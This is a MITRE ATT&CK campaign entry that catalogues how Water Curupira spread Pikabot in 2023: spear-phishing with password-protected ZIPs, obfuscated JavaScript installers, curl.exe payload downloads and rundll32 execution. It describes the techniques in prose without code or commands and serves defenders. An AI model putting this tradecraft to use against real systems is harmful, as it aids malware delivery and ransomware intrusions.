C0037 Water Curupira Pikabot Distribution

Pikabot was distributed in Water Curupira Pikabot Distribution throughout 2023 by an entity linked to BlackBasta ransomware deployment via email attachments. This activity followed the take-down of QakBot, with several technical overlaps and similarities with QakBot, indicating a possible connection. The identified activity led to the deployment of tools such as Cobalt Strike, while coinciding with campaigns delivering DarkGate and IcedID en route to ransomware deployment.¹

Item	Value
ID	C0037
Associated Names
First Seen	January 2023
Last Seen	December 2023
Version	1.0
Created	17 July 2024
Last Modified	28 October 2024
Navigation Layer	View In ATT&CK® Navigator

Techniques Used

Domain	ID	Name	Use
enterprise	T1059	Command and Scripting Interpreter	-
enterprise	T1059.003	Windows Command Shell	Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.¹
enterprise	T1059.007	JavaScript	Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.¹
enterprise	T1140	Deobfuscate/Decode Files or Information	Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.¹
enterprise	T1589	Gather Victim Identity Information	-
enterprise	T1589.002	Email Addresses	Water Curupira Pikabot Distribution utilizes thread spoofing of existing email threads in order to execute spear phishing operations.¹
enterprise	T1105	Ingress Tool Transfer	Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine’s temporary directory.¹
enterprise	T1566	Phishing	-
enterprise	T1566.001	Spearphishing Attachment	Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.¹
enterprise	T1218	System Binary Proxy Execution	-
enterprise	T1218.011	Rundll32	Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports `Crash` or `Limit` depending on the variant.¹
enterprise	T1204	User Execution	Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation.¹
enterprise	T1204.001	Malicious Link	Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.¹
enterprise	T1204.002	Malicious File	Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL.¹

Software

ID	Name	Description
S1111	DarkGate	Water Curupira Pikabot Distribution activity included distribution of DarkGate en route to ransomware execution.¹

References

Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot & Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign. Retrieved July 17, 2024. ↩↩↩↩↩↩↩↩↩↩↩↩